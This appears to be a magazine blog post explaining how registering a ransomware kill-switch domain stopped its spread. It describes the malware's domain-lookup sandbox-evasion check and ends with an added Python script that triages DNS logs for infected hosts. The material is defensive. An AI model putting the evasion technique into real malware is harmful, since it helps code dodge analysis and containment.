Ransomware Attack Stopped By Accident | Nu Origins Magazine

Yesterday’s global ransomware attack was scary for several reasons, but quick action by a security researcher at MalwareTech at least put an end to its spreading — although the researcher didn’t realize it at the time. The whole story is here, but the gist is this. The ransomware, as you may have heard, was spreading using an exploit disclosed from NSA records by the Shadow Brokers last month. It had the potential to spread quickly and far, as it in fact did, and in doing so attract the attention of IT people who would want to contain and study it.

As a safeguard against this, the payload contained some code that queried a certain domain known to the authors to be unregistered. This is because some network environments, such as contained VMs used to study malicious code, capture all outgoing data, like an attempt to connect to a domain, and return traffic of their own choosing.
The ransomware wanted to avoid activating itself in an environment like this, so it was designed to ping a certain unregistered domain — say, afn38sj729.com — and if it returns anything but a DNS error, chances are that its traffic is being manipulated, so it shuts down to avoid further analysis.

The security researcher, on seeing that the ransomware called out to this unregistered domain, immediately registered it so they could monitor the traffic (they could — producing the map above). They thought it would just help track its spreading, but in fact by registering that domain they effectively killed the whole attack. Because now when the code pinged that domain, it returned that it was registered, and therefore the ransomware would never activate itself! They’d pulled the plug and didn’t even realize it. (The researcher cottoned to it later during some tests of this type of behavior.)

It may have been accidental, but registering was the correct thing for the researcher to do — that may have been a command and control server, or perhaps it was a kill switch like this — and at any rate, you can’t argue with the results. Unfortunately, it doesn’t help people who are already hit by the ransom, but at least it prevented it rolling out further.
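The check described above leaves a trace defenders can use: every machine that ran the payload looked up the kill-switch domain, and the DNS answer it received decided whether the code went on. The following is an added example, not code from the article or from the researcher. It triages resolver logs on that basis, assuming a hypothetical four-field log format, the article's illustrative domain, and that any response code other than NOERROR counts as the "DNS error" case.

```python
from collections import defaultdict

# The article's illustrative domain; replace with the indicator from your own intel.
KILL_SWITCH_DOMAINS = {"afn38sj729.com"}

# Constructed sample resolver log (assumed format): timestamp client qname rcode
SAMPLE_LOG = """\
2024-01-01T09:14:02Z 10.0.4.17 afn38sj729.com. NXDOMAIN
2024-01-01T09:14:05Z 10.0.4.22 example.org. NOERROR
2024-01-02T08:01:44Z 10.0.4.17 AFN38SJ729.com. NOERROR
2024-01-02T08:02:10Z 10.0.7.3 www.afn38sj729.com. NXDOMAIN
2024-01-02T08:03:31Z 10.0.9.40 afn38sj729.com. SERVFAIL
malformed line
"""

def normalize(qname):
    """DNS names are case-insensitive and may carry a trailing root dot."""
    return qname.rstrip(".").lower()

def triage(log_text, watchlist=KILL_SWITCH_DOMAINS):
    """Map each client that looked up a watched domain to a triage record."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            continue  # skip blank or malformed lines
        ts, client, qname, rcode = fields
        if normalize(qname) in watchlist:  # exact name only, not subdomains
            events[client].append((ts, rcode.upper()))
    report = {}
    for client, seen in events.items():
        seen.sort()  # ISO-8601 UTC timestamps sort chronologically as strings
        last_rcode = seen[-1][1]
        report[client] = {
            "lookups": len(seen),
            "first_seen": seen[0][0],
            "last_rcode": last_rcode,
            # A DNS error is the case in which, per the article, the code does
            # not shut down, so those hosts come first. Any lookup at all still
            # means the payload ran on that client.
            "priority": "isolate-now" if last_rcode != "NOERROR" else "investigate",
        }
    return report

if __name__ == "__main__":
    for client, info in sorted(triage(SAMPLE_LOG).items()):
        print(client, info)
```

The same logic implies that a DNS filter which answers the kill-switch name with an error keeps the payload active on hosts behind it, so the domain should stay resolvable while lookups for it are logged and alerted on.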